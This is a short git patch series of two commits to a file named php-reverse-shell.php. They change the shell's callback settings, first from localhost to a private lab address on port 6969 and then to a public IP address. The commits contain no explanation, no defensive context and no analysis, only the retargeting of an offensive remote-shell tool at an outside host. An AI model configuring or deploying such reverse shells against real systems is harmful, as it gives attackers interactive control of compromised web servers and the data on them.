From 99c77c36bcf442089fa1f0ff2caab630a9a14ede Mon Sep 17 00:00:00 2001 From: "Puttimate \"Jusmistic\" Thammasang" Date: Sat, 21 Apr 2018 20:59:34 +0700 Subject: [PATCH 1/2] Update php-reverse-shell.php --- php-reverse-shell.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..63ecb38 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = '192.168.56.1'; // CHANGE THIS +$port = 6969; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; From 0661bb5dd99956cc101a99e7fd0b8069f19bfbe4 Mon Sep 17 00:00:00 2001 From: "Puttimate \"Jusmistic\" Thammasang" Date: Fri, 11 May 2018 23:06:35 +0700 Subject: [PATCH 2/2] Update php-reverse-shell.php --- php-reverse-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 63ecb38..c131c8e 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,7 +46,7 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '192.168.56.1'; // CHANGE THIS +$ip = '13.229.232.228'; // CHANGE THIS $port = 6969; // CHANGE THIS $chunk_size = 1400; $write_a = null;